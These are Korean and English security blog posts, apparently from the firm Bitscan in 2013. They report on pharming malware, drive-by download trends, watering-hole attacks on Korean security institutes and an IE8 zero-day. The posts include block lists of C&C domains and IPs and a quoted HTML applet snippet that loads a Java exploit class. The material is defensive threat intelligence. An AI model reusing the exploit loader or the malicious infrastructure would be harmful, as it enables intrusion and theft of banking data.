금융정보 탈취를 위한 파밍 악성코드는 2013년부터 활발하게 감염을 시도하고 있는 상황이다. 이에 따라 금융정책 당국 및 금융기관에서도 여러 수준의 경고를 통해 사용자에게 주의를 환기 시키고 위험성을 당부하고 있다. 그러나 이미 2013년 상반기에만 2012년 전체의 피해를 상회하는 피해금액이 발생된 상태에서 보듯 확산일로에 있다. 피해확산의 원인 중 가장 큰 부분은 불특정 다수를 겨냥한 대량 감염이며, 대량 감염을 위해 웹서비스를 방문함과 동시에 감염되는 Drive by download 공격을 공격자들이 이용하고 있기 때문이다.

 

http://news.naver.com/main/read.nhn?mode=LSD&mid=sec&sid1=101&oid=001&aid=0006478598

 

2012년까지만 해도 웹서비스를 통한 악성코드 감염은 게임계정 탈취가 대세를 이루고 있었으나 2013년 시작부터 금융 정보 탈취로 대거 선회하고 있는 상황이라 피해 급증은 충분히 예상된 상황이라 할 것입니다. 일반 소비자 및 사용자들의 커뮤니티에도 낯설지 않게 파밍 관련 피해에 대한 글들이 올라오는 상황이라 피해 범위는 보다 광범위하고 오래갈 것으로 예상됩니다.

 

초기의 파밍은 금융기관의 Domain 주소를 공격자 IP로 지정하는 Hosts 파일에 대한 변조가 주를 이루었고 이후 Hosts 파일에 대한 모니터링과 감시가 강화되자 Hosts.ics 파일을 이용한 주소 변조가 다수를 이룬 것을 관찰 할 수 있습니다. 일반적으로 금융기관에 직접 접근 하는 횟수가 많지 않은 상황에서 공격자들은 추가적으로 메일 및 국내 대형 포털들의 주소까지도 위장하도록 하여 사용자를 유인할 만큼 적극적인고 대범한 공격들을 실행하고 있는 상황입니다.

 

<2013년 7월까지 발견된 포털 주소를 위장한 팝업 파밍>

 

포털 주소를 위장한 사례의 경우 가짜 사이트를 만들어서 연결되도록 하고 URL은 동일하더라도 공격자의 IP로 연결 되도록 한 상황입니다. 실시간으로 뉴스와 기사가 업데이트 되는 포털들의 변화가 관찰 되지 않으므로 조금만 주의를 기울이면 문제를 알 수 있는 상황입니다. 또한 전방위적으로 금융감독원을 사칭한 팝업창은 악성코드라는 주의가 다수의 언론매체를 통해 보도가 된 상황이라 사용자들도 높은 경각심을 가진 상황이 됩니다.

 

<2013년 9월초 발견된 포털 배너를 위장한 파밍 공격>

<2013년 9월초 발견된 포털 배너를 위장한 파밍 공격 2>

 

9월초에 처음 발견된 공격 유형은 팝업창이 아닌 배너를 통한 파밍 공격이 최초 발견 되었습니다. 팝업창에 대한 주의가 높아짐에 따라 공격 형태를 변경한 것을 확인 할 수 있습니다. 이 경우에도 실제 포털과는 관계 없는 공격자가 인위적으로 만든 포털 사이트 첫 화면에서 배너만 파밍 사이트로 연결되도록 구성한 것이 관찰 됩니다. 주된 공격 형태는 포털사이트의 주소와 주요 메일에 대한 주소를 Hosts 파일과 Hosts.ics 파일을 통해 공격자의 파밍 사이트 주소로 설정해 둔 상태라 할 수 있습니다. 본 사례의 경우에도 실시간 검색과 같은 변화나 기사에 대한 변동 등은 없는 상태임을 확인 할 수 있습니다.

 

9월 10일 최초 발견된 포털의 광고서버를 파밍 사이트 주소로 변경하여 실제 포털 서비스에서 광고 영역만을 파밍 사이트 연결 배너로 교체한 사안은 보다 정교해지고 사용자가 당할 가능성이 매우 높은 부분이라 할 수 있습니다.

< 2013.9.10일 국내를 대상으로 대량 유포된 악성코드의 파밍 기능 >

파밍 사이트는 nv1.ad.naver.com 주소를 공격자의 IP로 변경하도록 하여 정상 포털을 접속 하였음에도 불구하고 배너 광고만 공격자가 지정한 광고( 파밍 사이트 연결)로 나타나는 상황입니다.

 

현재 9월 이후에 발견되는 공격들은 9.26일부터 실시되는 전자금융 사기 예방 서비스 시행안내를 역으로 파밍 공격에 이용하는 대담함을 엿볼 수 있습니다. 그만큼 자신감에 차 있다는 것으로 보입니다.

< 2013.9.10일 국내를 대상으로 대량 유포된 악성코드의 파밍 기능 - 내역>

로그인 및 모든 포털 기능은 정상적으로 작동을 하며, 단지 배너 광고에 이용되는 도메인만 공격자가 만들어둔 파밍 사이트로 연결 하도록 되어 있습니다. 포털을 접속하면 광고만 공격자 IP로 연결 되는 상황이고 모든 서비스는 정상적이라 사용자가 의심을 하기에는 상당히 어려워 보입니다.

 

호스트파일 변조 내역에는 금융기관은 최소화하고 배너 광고의 경우에도 포털의 배너 서버인 nv1.ad.naver.com 을 파밍 사이트로 연결 되도록 한 상황이라 탐지 여부를 인식하기에는 어려움이 있을 것으로 보입니다.

 

< 9.10일 발견된 악성코드의 Hosts 파일의 변조 내역 샘플 >

 

파밍 사이트 연결도 다양한 방식으로 시도되고 있고 파밍 IP들도 계속 변경 되고 있는 상황입니다. 근본적인 문제 해결은 웹을 통한 대량 악성코드 감염 시도에 대해 모니터링을 강화하고 초기 단계에서 피해 범위를 최소화 할 수 있는 다양한 노력으로 문제를 줄일 수 있도록 노력해야 할 것입니다.

 

문제의 원인을 해결하고 줄일 수 있도록 노력을 해야 문제는 최소화 됩니다. 사용자의 주의를 당부하고 불법 파일 다운로드와 백신을 통한 해결만으로는 현재 상황은 어려운 부분이 있지 않나 생각 됩니다. 지금 이 순간에도 변화하는 공격기술은 이제 대응을 순식간에 무력화 하는 상태로 계속 발전 하고 있습니다.

 

문의 info@bitscan.co.kr  , 최신 정보는 www.facebook.com/bitscan 페이지에서 확인 가능

Posted by 바다란

인터넷 위협 수준: 관심

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )

 

<주간 유포된 도메인 수>

 

8월 2주차 전체 발견된 악성링크는 당사가 관찰하였던 기간 중 최고로 낮은 움직임을 보였고, 신규 악성링크는 지난주보다 더욱 감소하였으며 파급력도 함께 최저치를 기록하였다. 한편, 신규 악성링크는 소수의 MalwareNet 과 결합한 형태로 파밍에 관련된 악성코드를 유포하였으며 포털 사이트, QR코드를 이용하는 파밍사이트가 발견되었다. 이 중 포털사이트를 이용한 파밍이 기존에 네이버, 다음을 이용하였고, 금주에는 "네이트" 포탈까지 활용된 정황이 포착되었으나, 불완전한 공격으로 접속이 이루어지지 않았다. 또한, QR 코드를 이용한 파밍 은행사이트도 늘어난 모습이 관찰되었다.

 

<시간대별 통계>

 

시간대별로 자세히 살펴보면 금주에 일요일-화요일 새벽까지 전혀 활동을 하지 않는 비정상적인 움직임이 나타났다. 그 대신 평일 화요일 오후-토요일까지는 꾸준히 활동을 하는 모습을 보였다.

 

<최근 1달 악성링크 도메인 통계>

 

7월 1주차부터 8월 1주까지의 최근 6주 동안의 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 212건(52.6%), 미국 57건(14.1%), 일본 119건(29.5%), 홍콩 1건(0.2%), 네덜란드 1건(0.2%), 태국 12건(3.0%), 독일 1건(0.2%) 등으로 나타났다.

 

<주간 악성링크 도메인 통계>

 

국가별 악성링크 도메인 통계를 분석한 결과 한국이 26건(66.7%), 미국이 13건(33.3%)순으로 차지하였으나, 일본 등 그외 국가에서는 나타나지 않았다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는info@bitscan.co.kr 로 연락주십시오.

감사합니다.

 

고급보안정보구독서비스

소개

국내외 180여만개(국내 150만, 해외 30만) 웹사이트에서 발생하는 해킹, 변조, 침해사고를 탐지하여 공격에 대한 이슈, 실제 범위 미치는 영향 등을 주간 단위로 분석하여 제공하는 정보제공서비스

 

서비스 유형

  • 주간 브리핑 악성코드 유포 범위와 경유지, 국내에서 많은 영향을 미치는 이슈를 중점 서술
  • 동향 분석 - 한 주간의 공격 동향에 대한 요약과 새로운 공격 형태 정보 기술
  • 기술 분석 - 한 주간의 악성링크와 악성파일에 대한 실행 기반의 분석 정보 기술
  • 전문 분석 새로운 공격 기법이나 제로데이 출현시 수시로 제공
  • C&C 봇넷 정보 APT 및 좀비 PC에서 이용되는 네트워크 연결 정보(callback)
  • 악성코드 샘플 감염 공격 악성파일에 대한 샘플(스크립트, 익스플로잇, 악성바이너리)

 

제공 시기

  • 정기 - 주 1회(수요일)
  • 비정기 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 수시

 

무료 구독자

  • 주간 브리핑 요약 주간 브리핑 보고서의 내용을 2장 분량으로 요약제공 (정기)
  • 긴급 정보 제공 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 (수시)

 

정기 구독자

  • 베이직 주간 브리핑, 동향 분석
  • 스탠다드 주간 브리핑, 동향 분석, 기술 분석
  • 프로페셔널 주간 브리핑, 동향 분석, 기술 분석, 전문 분석
  • 엔터프라이즈 주간 브리핑, 동향 분석, 기술 분석, 전문 분석, C&C 봇넷 정보

악성코드 샘플은 별도 협의

 

구독 문의

 

감사합니다.

Posted by 바다란

인터넷 위협 수준: 관심

Bitscan PCDS 주간 동향 브리핑 요약

*위협은 끝나지 않는다 형태만이 변경되고 달라질 뿐이다.


( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )


<주간 유포된 도메인 수>

 

8월 1주차에 발견된 악성 관련 링크는 지난 주에 비해 더욱 감소를 하였고, 신규 악성링크도 또한 56% 정도 감소하였다. 하지만 다양한 공격은 지속되고 있으며, 특히, 이중 난독화를 활용하는 CK VIP Exploit Kit을 이용하는 비율(전체 Exploit Kit 비율 중)이 전주 대비 약 50%에서 금주에 약 80%까지 증가하였다. 지난주에 나타났던 특정포트를 이용하는 공격, 일본, 미국의 도메인을 이용한 국내에서의 유포는 금주에도 계속 이어졌다. 또한, 태국의 특정 IP 대역을 이용한 유포가 관찰되었다. 금주에는 비정상적으로 공격 활동이 줄어든 정황이 관찰되고 있으며, 새로운 공격 유형 및 위협이 생길 가능성이 예상되고 있어서 "인터넷 위협" 수준을 "관심" 단계 그대로 유지한다. 

 

<시간대별 통계>

 

시간대별 통계를 살펴보면 지난주 주말 집중적으로 많은 유포를 보였던 악성링크의 활동이 금주 주말에는 감소하는 모습을 보였다. 하지만, 평일의 활동은 지난주와 비슷한 모습을 보였으며 수요일 – 금요일까지 꾸준히 유포하였다.

<최근 1달 악성링크 도메인 통계>

 

7월 1주차부터 8월 1주까지의 최근 6주 동안의 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 221건(52.6%), 미국 52건(12.4%), 일본 132건(31.4%), 홍콩 1건(0.2%) 네덜란드 1건(0.2%), 태국 12건(2.9%), 독일 1건(0.2%)등으로 나타났다.

 

<주간 악성링크 도메인 통계>

 

국가별 악성링크 도메인 통계를 분석한 결과 일본이 19건(40.4%), 한국이 16건(34.0%), 미국이 6건(12.8%) 태국이 6건(12.8%)순으로 차지하였다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는info@bitscan.co.kr 로 연락주십시오.

감사합니다.

 

고급보안정보구독서비스

소개

국내외 180여만개(국내 150만, 해외 30만) 웹사이트에서 발생하는 해킹, 변조, 침해사고를 탐지하여 공격에 대한 이슈, 실제 범위 미치는 영향 등을 주간 단위로 분석하여 제공하는 정보제공서비스

 

서비스 유형

  • 주간 브리핑 악성코드 유포 범위와 경유지, 국내에서 많은 영향을 미치는 이슈를 중점 서술
  • 동향 분석 - 한 주간의 공격 동향에 대한 요약과 새로운 공격 형태 정보 기술
  • 기술 분석 - 한 주간의 악성링크와 악성파일에 대한 실행 기반의 분석 정보 기술
  • 전문 분석 새로운 공격 기법이나 제로데이 출현시 수시로 제공
  • C&C 봇넷 정보 APT 및 좀비 PC에서 이용되는 네트워크 연결 정보(callback)
  • 악성코드 샘플 감염 공격 악성파일에 대한 샘플(스크립트, 익스플로잇, 악성바이너리)

 

제공 시기

  • 정기 - 주 1회(수요일)
  • 비정기 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 수시

 

무료 구독자

  • 주간 브리핑 요약 주간 브리핑 보고서의 내용을 2장 분량으로 요약제공 (정기)
  • 긴급 정보 제공 인터넷 위협 수준이 "4단계. 경고" 이상일 경우 (수시)

 

정기 구독자

  • 베이직 주간 브리핑, 동향 분석
  • 스탠다드 주간 브리핑, 동향 분석, 기술 분석
  • 프로페셔널 주간 브리핑, 동향 분석, 기술 분석, 전문 분석
  • 엔터프라이즈 주간 브리핑, 동향 분석, 기술 분석, 전문 분석, C&C 봇넷 정보

악성코드 샘플은 별도 협의

 

구독 문의

 

감사합니다.

Posted by 바다란

2013.6.16일  관찰 결과에 따른 추가 차단 권고 드립니다. 


6월 2주차 대비 대거 줄어든 공격 동향을 보이고 있으나, 여전히 일부 영역에서는 계속된 감염 시도가 발견 되고 있습니다. 모두 국내 백신 탐지 우회 및 VT 미보고된 샘플들이 감염 되고 있는 상황입니다.

몇 가지만 전달 드리면 되기에, 미리 알려 드립니다.

- 지난 5차에도 알려 드린  내용이지만 서브 도메인 변경이 계속 되는 곳들은 Multiple 하게 막을 필요가 있습니다.
*.gnway.net
*.hfhssv.net
*.kbszombi.com
*.mbczombi.com

- 이외 신규 출현 C&C 추정

googlekr.com
count.rww456.com
fmom.juandy.com
wm.lolddd.com
count.korea2046.com
www1.ktk01.com ( *.ktk01.com - 적용도 필요해 보임)

위와 같이 다중으로 차단이 필요한 도메인 정보 4곳과 6월 3주차 추가 출현된 연결정보 6곳을 알려 드립니다.  추가 정보들이 더 많이 있으나, 가장 대표적인 것들을 알려 드리며, 내부 인터넷 PC 사용자들의 감염 현황은 주초에 차단 리스트를 확인해 보시면 감염 현황을 아실 수 있을 것으로 보입니다.

현재까지는 6월 2주차 대비 공격은 현격하게 줄어든 상황이며, 소규모 출현들만 계속 되고 있는 상황이라 간략하게 정보 전달 드립니다.

악성링크뿐 아니라 연결 정보들까지도 확인된 정보만을 전달 드립니다.

정보제공 서비스에 대한 문의는  info@bitscan.co.kr 입니다.

감사합니다.

Posted by 바다란

안녕하세요. 빛스캔입니다.


6월 2주차에 악성링크 수치가 역대 최대치를 기록하는 상황이라 정보의 정리와 분석에 시일이 다수 소요 되었습니다. 정상적으로 6월 2주차 정보제공 서비스는 6.12일에 발송 되었으며, 금일에는 현재 위협레벨인 "경고" 레벨이 그대로 유지됨에 따라 정보를 공유 합니다.

본 공개용 정보에는 국내를 대상으로한 악성코드 유포 관찰 이래 가장 많은 수치의 악성링크가 6월 2주차에 출현 하였으며, 바이너리를 대량 유포하는 행동들이 직접 관찰된 상황입니다. 따라서 확인되고 분석된 정보들 중에서 국외 ISP를 이용한는 정보들은 그대로 공개를 하도록 하겠습니다.  

내부 공유 정보는 6월 2주차 기간동안 대량 유포 및 감염에 사용된 바이너리 총 42종과 동적 분석 정보 40건이 전달 됩니다. 

또한 전체적으로 외부 연결을 통해 추가 다운로드 시도 및 다수의 C&C 서버로 연결하는 정황들이 발견 되어 정리 내용이 많습니다.

최종 다운로드 주소 및 네트워크 연결 정보

국외: 미국,일본 - 60여곳


악성링크 출현 IP 영역

국외 : 44종


* 공개용으로는 바이너리 및 분석정보 제공 되지 않으며, 국내 IP 영역과 도메인은 모두 제외된 상태에서 전달 됩니다.

    < 정식 서비스 구독 기업/기관 전달된 바이너리 내용 - 참고용>



종합하여 바이너리 42개 , 분석정보 40종. - 제공 불가
최종 다운로드 주소 및 C&C  주소 ( 해외 60곳, 국내 7곳-제외) - 67곳
악성링크 출현 IP 영역  ( 국외 : 44종 , 국내 25종 -제외 )  - 69종 


미국,일본의 ISP를 이용한 대량 공격에 직접 이용된 상황이라 빠른 차단과 내부 PC가 해당 IP 대역대로 연결 될 경우 거의 100% 좀비 PC 가능성이 있으므로 신속하고 빠른 대처를 하시기 바랍니다.

특히 일본 ISP를 이용한 연결 시도들은 노골적인 형태를 보이고 있는 상태입니다. 반드시 내부 감염 PC 확인을 하셔야 할 것으로 보이며, 내부 감염 PC 확인 이후 차단까지 연계 되어야 효과가 있을 것으로 보입니다.

06091.yuzombi.com   115.176.219.81 japan Fujitsu Limited
06111.kbszombi.com 220.146.166.132 japan Fujitsu Limited
www.kbs8803.com:81 126.19.85.220 japan Softbank BB Corp
www.kbs8805.com:81 124.25.194.122 japan Softbank BB Corp
www.mbc006.com:81 121.94.31.40 japan Fujitsu Limited
www.mbc001.com:81 126.15.1.74 japan Softbank BB Corp
www.mbc003.com:81 126.15.1.74 japan Softbank BB Corp
mr1000.gnway.net         126.19.86.211 japan Softbank BB Corp
mis1000.gnway.net 126.114.229.16 japan Softbank BB Corp
mis7000.gnway.net 126.114.228.136 japan Softbank BB Corp
www.kbs8801.com:81 126.15.4.38 japan Softbank BB Corp
www.kbs8802.com:81 ` 126.15.4.37 japan Softbank BB Corp
www.kbs8805.com:81 126.15.4.34 japan Softbank BB Corp
0610.kbszombi.com 220.146.166.132         japan Fujitsu Limited
0611.kbszombi.com 220.146.166.132         japan Fujitsu Limited
0612.kbszombi.com 220.146.166.132         japan Fujitsu Limited
06092.yuzombi.com 220.146.166.132         japan Fujitsu Limited
06093.yuzombi.com 220.146.166.132         japan Fujitsu Limited
06091.yuzombi.com 220.146.166.132         japan Fujitsu Limited
06081.yuzombi.com 220.146.166.132         japan Fujitsu Limited
06111.kbszombi.com 220.146.166.132         japan Fujitsu Limited


6월_긴급정보공유(공개용)_5차(20130613)_1645.pdf


문의는 info@bitscan.co.kr 로 주십시요. 또한 IP에 대한 차단과 대응에 관련된 부분은 각 기업/기관의 판단에 따른 문제입니다.  현재 전달되는 다수의 해외 C&C 및 공격용 IP 대역에 대한 정보는 지금도 활성화 된 상태를 유지하는 곳들이 많은 상태이니 빠른 확인과 대응을 하시길 ..


* 현재 경고레벨에서의 정보 공유와 공개 부분에 높은 수준의 부담이 계속 되고 있어서, 경고 수준을 유지하더라도 정보 공유와 공개가 향후 원활하지 않을 수 있음을 알려 드립니다. 



감사합니다.

Posted by 바다란


긴급정보제공 4

(인터넷 공개용)

 

No. SEIS-13-06-01 

2013 6 4

Bitscan

 

 

 

상황 요약

지난 5월 4주차 위협레벨 상향에 따른 대응 조치로 내부 고객사를 대상으로 선제적인 정보 공유를 진행하고 있습니다. 지난 주에 1차, 2차 정보 공유를 진행 드린바가 있습니다. 6월 1주차 관찰 결과에 따라 위협레벨 조정을 하려 하였으나, 규모는 줄었으나, 영향력은 더욱 증대된 위협들이 감지되어 현행 그대로 당분간 "경고" 레벨을 유지하고 있습니다.

 

제한된 인력과 자원을 이용하여 수집된 정보를 가공하고 분석하는 형태라 오랜기간 지속이 어려운 점을 양해해 주시기 바라며, 위협상황이 계속 되는한 최대한 유지 할 수 있도록 노력 하겠습니다.

 

먼저 5월 4주차의 경우 대규모 악성코드 유포 통로인 MalwareNet이 다수 활성화 되는 경향이 관찰 되어 "경고"로 상향된 바 있습니다. 최근 관찰된 유형 중에 가장 빠르고, 급속한 증가 추세를 보여서 레벨 상향을 진행 하였고, 토런트 정보 공유 사이트들 다수도 악성코드 경유지로 이용된 정황이 있어서 정보 공유를 한 것입니다.

 

6월 1주차에서는 일부 정보 공개와 연관성이 있을지는 모르겠으나, 기 공유 및 공개된 정보들은 활동이 극히 줄어든 상태를 보였습니다. 그러나 영향력이나 파급력 측면에서 확실히 높은 영향력을 가지고 있는 서비스들에 대해서 공격이 계속된 정황이 탐지된 상황입니다. 더불어 파일 공유 사이트 상위권 서비스들과 포털, 소셜 댓글 서비스 자체가 유포에 이용된 상태라 영향력은 5월 4주차 보다 높은 상태라 할 것입니다.

 

따라서, 현재 위협레벨은 5월 4주차에 비해 규모는 줄었지만, 영향력이나 파급력은 더 높아진 상태가 직접 관찰되어 위협레벨은 "경고" 그대로 유지 됩니다.

금일(6월 4일) 새벽에 다수의 악성링크를 통해 동일한 바이너리가 다수 유포된 정황을 파악하고, 분석한 자료(C&C 연결정보 등)을 추가로 제공합니다.

 

 

공유 정보

외부 정보 공개용으로는 가장 심각한 피해를 입히고 있는 악성링크 부분과 MalwareNet에 대한 정보, 다운로드 및 C&C 정보중 시급성이 높은 정보에 대해서 공개를 하였고 국내 IP의 경우는 고객사들만을 대상으로 하여 전달되었습니다. 국내 IP의 경우 차단에 있어서 신중을 기해야 하니 주의하여 차단하시기 바랍니다.

 

6월 4일 전달되는 4차 정보공유는 다음과 같습니다.

 

198.15.93.188~190 [USA] 긴급 차단 및 연결되는 PC 확인 필요(긴급차단이 필요한 C&C의 경우 악성파일에 대한 동적분석 결과는 파밍을 하는 것으로 나오나, 파밍 이외에 트로이 목마 기능도 첨부된 것으로 확인. VT 진단 결과는 국내 주요 백신 탐지 회피 중임.)

 

이외 차단리스트

 

216.218.249.42 [USA] <-신규

198.15.86.70

198.15.71.194

*.gnway.net

*.hellowfrog.com

F/W, WAF 등 차단장비에 IP/도메인 등록시 반드시 확인 과정을 거쳐 주시기 바랍니다.

 

 

샘플 수집 당시, VirusTotal 진단 스크린샷

 

 

   

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는info@bitscan.co.kr 로 연락 주십시오. 또한, 당사에서 제공하는 다양한 정보는 빛스캔 페이스북 페이지에서 확인하실 수 있습니다. http://www.facebook.com/bitscan

감사합니다.

Posted by 바다란

* 경고단계로 5.26일 상향 . 국내 ISP의 특정구간에 설치된 10G 차단장비 한 곳의 5.27일의 차단결과 확인

수십여 개의 악성링크 중 단 하나의 악성링크 차단 결과가 5.27일 하루만 24만건에 달함. 그만큼 치명적이고 접속자가 많은 곳들을 직접 노린 공격이 시도 되고 있음을 나타내는 확인 결과. 전체 규모는 확인 불가 한 상황이며, 일부구간에서의 탐지 결과이므로 전체의 상황은 더 심각한 상황으로 추정되고 있음.

6월 1주차까지 현 상태 평시로 전환 안될 경우 Level 4경고는 계속 유지될 예정입니다.

 

Bitscan PCDS 주간 동향 브리핑 요약

( Bitscan Pre-Crime Detect Satellite Weekly Trend Briefing Summary )

 

<주간 유포된 도메인 수>

*5월 4주차 동향보고서 및 브리핑 요약에는 이제 해당 주에 출현한 악성링크의 파급력이 추가 되었습니다. 해당 주차에 출현한 단 하나의 악성링크가 얼마나 여러 곳에 들어가 있었는지를 종합하여 전체 인터넷 위협에 미치는 영향력을 감안 하도록 되어 있으니 참고 하십시요.

 

5월 4주에는 전주에 비해 악성링크의 수치 및 영향도가 급격하게 증가한 것이 관찰되었다. 일시에 3~4개의 MalwareNet을 생성하고 총 80곳 이상을 경유지로 만든 이후 백신제품들에 탐지되지 않는 악성코드를 동시에 감염 시도하는 것이 관찰되었다. 또한 5월2주 이후로 보이지 않았던 Redkit에서 변화된 CoolKit을 이용한 악성링크도 약 20 여개의 도메인에서 출현하였으며, 탐지를 우회하기 위해서 비정상 링크를 수시로 변경하는 전략을 보였다. 매주 발견되는 신규 악성링크의 유포 행위는 꾸준히 변경되기 때문에 전체 범위를 모니터링 하고 사전탐지 하지 않은 이상 예측이 힘들 수밖에 없다는 점을 고려해야 하며, 5월 4주차 PCDS 관찰 기간 내에 매우 비정상적인 유포 움직임이 관찰되어 관찰경보가 "주의"에서 "경고"로 상향한다. 5월 4주차 이후에도 PCDS 관찰 2년 이내 가장 활발한 MalwareNet 생성 움직임과 주요 웹서비스들 다수가 활용된 정황, 백신 미탐지 악성코드의 유포시도는 현재도 계속 되고 있다.

 

<시간별통계>

 

금주의 시간 별 통계를 살펴보면, 신규 악성링크의 유포가 수요일, 금요일, 토요일, 일요일 오후와 새벽에 집중적으로 발생했다는 것을 관찰하였다. 구체적인 시간을 살펴보면, 수용일 00시~08시, 금요일 17시~23시, 토요일 01시~04시와 18시~22시, 일요일에는 모든 시간대에 걸쳐 집중적인 유포가 발생하였다.

 

 

<최근 1달 악성링크 도메인 통계>

4월 3주차부터 5월 4주까지의 최근 6주 동안의 주요 국가별 악성링크 도메인 통계를 살펴보면, 누적 수는 한국이 230건(45.4%), 미국 141건(27.8%), 홍콩 110건(21.7%), 일본 11건(2.2%), 태국 6건(1.2%), 독일 4건(0.8%), 대만 5건(1.0%) 등으로 나타났다. 지속적으로 Class 대역을 이용하는 홍콩 IP는 이번 주에는 관찰되지 않았다.

 

<주간 악성링크 도메인 통계>

국가별 악성링크 도메인 통계를 분석한 결과, 한국이 34건(55.7%), 미국이 25건(41.0%), 독일이 2건(3.3%) 순으로 차지하였다.

 

주간동향 요약 보고서(무료)를 메일로 수신, 정식 보고서(유료) 및 데모 관련 문의는info@bitscan.co.kr 로 연락주십시오. 여러 정보에 관한 내용은 빛스캔 페이지에서 확인 가능합니다. www.facebook.com/bitscan

감사합니다.

Posted by 바다란

Targeted attacks (watering hole) against S.Korea national security institutes are emerged in 16 May.

 

We worried about wrong information at this article: http://threatpost.com/ie-8-zero-day-pops-up-in-targeted-attacks-against-korean-military-sites/

 

A word 'Watering hole' means the infection attempts on the sites where the visitors are specific. In other words, the attacks lead to infect not normal peoples, but peoples are in specific stratum. In Korea, attacks against the game users are already detected since 2005. And the attack called 'Drive-by Download' that allows people infected just by visiting is widely issued globally. More broad and anonymous attacks are detected in Korea every week.

16 May 2013, the day before the national holiday, the attacks targeted against national security institutes are emerged and more several issues are detected. This attack can be defined as a watering hole because normal users are rarely visiting the national security institute's web sites.

Until these days, at least four national security institutes are detected as victims and more victims may exist. But four victims are founded based on the PCDS(Pre Crime Detect Satellite) until now and attacks are covertly and persistently made up.

There are two types of malicious links injected by the alteration of the compromised web site's source codes. The one uses the shorten URL that redirect to the same malicious link. Usage of shorten URL for the malicious purpose is pointed out because of the security problems, but it is pregnant that shorten URL for the malicious link is used in PC environment, not mobile area for the malicious application installation, because it is used for avoid the detection.

The victims are KIMA(Korea Institute for Military Affairs), KINSA(Korea Institute for National Security Affairs), KRIS(Korea Research Institute for Strategy) and KIMS(Korea Institute for Maritime Strategy). These are specific purpose institutes that normal peoples are rarely visited.

The attackers have the privileges to change the web site's source codes and inject malicious link for drive-by downloads. There attacks have purpose of malware infection for targeted victims, not just change the web site's front page.

There are two Oracle Java vulnerabilities CVE-2013-1493 and CVE-2013-2423 are used to attack. Details of vulnerabilities are founded in http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493 and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423.)

The malicious link used is already detected from PCDS in April, but the link is registered as an abnormal link because there are no exploit codes at that time. But the exploit codes are added and it may have more unrevealed attacks prior to 16 May.

The first detected malicious link in April is 'www.sunshop.com.tw/images/header.js'. This link is founded some of the four national security institutes issued now. The attackers remain that the malicious link have no exploit codes and they inject exploit codes to header.js file in 16 May to attack. More attacks are expected prior to April because PCDS already detected. The binary that executed after exploit is estimated as a backdoor.

Some parts of exploit codes used for Oracle Java vulnerability is as follows.

<html><head></head><body><applet archive="OS7aOmC5UPE2iQDJ.jar" code="Init.class" width="1" height="1"></applet><applet archive="0DUIOMCiPZUXfBvE.jar" code="Xxploit.class" width="1" height="1"></applet></body></html>

 

At least four national security institutes and the malicious link which related to Taiwan is blocked and additional actions are made up.

Form this case, the targeted attack not only e-mail attached attacks targeted major agencies, but also targeted specific visitors like watering hole is on the rise seriously. The problem is more complicated because there are rarely had the protection systems compared to e-mail attacks.

Also this type of attack is advanced that they add exploit codes when decided to attack and they use shorten URL to avoid detection.

The persistent attacks targeted major agency and corporations are covertly on going. Moreover follow attacks after 20 March incident raise the concerns about reaction plans.

The scalable infection mechanisms are started from the injection of malicious link to the compromised web site. If we can't block the entrance path of compromised web sites, the same incidents are going on and on. Also the information which leaks contains professional ones because the attack is targeted.

The attacks through the injection of malicious link to compromised web sites are widely used and it is difficult to detect that the shorten URL is malicious or not. Most people have no idea that they can be infected just by visiting compromised web sites.

The malicious link that redirected from the normal web site uses several application vulnerabilities of victim environment to download and execute automatically. And it is hard to react because the malware executed is made to avoid major anti-virus protections.

The attacks are valid to every people who visit the compromised web sites and they can be infected if they have just one of vulnerabilities. The additional losses are expected because attacks have all privileges after infection.

From the aspects of reaction, they have to solve this problem through the cooperation of the professional agency or corporation if they can't find the solution themselves. If the fundamental causes are not fixed, continuous malicious distribution and information leakage have to be considered.

 

Posted by 바다란

IE 8 노린 제로데이 공격, 국내서 발생

*기사제공된 원문입니다.

 

 

최근 해외에서는 국가 및 공공 기관을 전문적으로 노리는 워터링 홀 공격(표적 공격)이 자주 발생하고 있다. 더욱이 이 공격에서는 제로데이 취약점(보안 취약점이 해결되지 않은 상태에서 공격 코드가 사용되어 실제적인 대응이 불가능한 취약점)을 활용하는 사례가 증가하고 있으며, 대표적인 예가 노동부(Department of Labor)이다.

 

지난 5월 3일, Internet Explorer 8 버전에서만 동작하는 새로운 제로데이 취약점(CVE-2013-1347)을 활용한 공격이 미 노동부 웹사이트에서 발견되었으며, 이후 추가적으로 8개의 다른 웹사이트에서도 동일한 공격이 있었다는 뉴스를 통해 전방위적인 공격이 있었음을 알 수 있었다. 실제 관련된 보안 패치가 발표된 시점이 5월 15일이었기 때문에, 그 기간 사이에는 보안 업체 및 관련 기관에서 이에 대해 효과적으로 대응할 수 있는 방법이 거의 전무한 상황이었다. 다만, 이러한 사례는 국내가 아닌 해외 사례이기 때문에 국내에는 그리 큰 영행을 미치지 않은 상황이었다.

 

황금연휴이던 5월 18일 새벽에 YTN 웹사이트에서 IE 8 제로데이(CVE-2013-1347)을 활용하는 드라이브바이다운로드 공격이 진행되었으며, 추가적인 분석을 통해 국내에서 최초로 발생하였음을 공식적으로 확인되었다.

 

[사진 1. YTN 웹사이트에서 발견된 IE 8 제로데이 공격 링크]

 

참고로, 드라이브바이다운로드(Drive-by-download) 공격은 사용자가 파일을 다운로드하거나, Active-X 컨트롤을 실행하는 과정 없이, 웹사이트 방문만으로도 악성코드에 감염될 수 있는 공격자로서는 효율이 꽤 좋은 웹 공격 방식이다.

[사진 2. CVE-2013-1347 취약점을 활용하는 실제 코드]

 

